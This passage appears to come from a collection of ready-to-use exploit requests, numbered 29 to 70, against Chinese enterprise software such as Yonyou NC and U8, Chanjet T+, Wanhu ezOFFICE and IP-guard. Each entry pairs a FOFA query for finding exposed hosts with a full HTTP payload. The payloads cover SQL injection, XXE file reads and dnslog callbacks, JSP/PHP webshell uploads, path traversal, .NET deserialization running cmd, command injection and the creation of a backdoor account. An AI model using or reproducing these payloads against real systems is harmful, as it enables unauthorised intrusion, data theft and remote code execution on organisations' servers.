Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government financial cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the following request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: access the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing at lines 42-43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
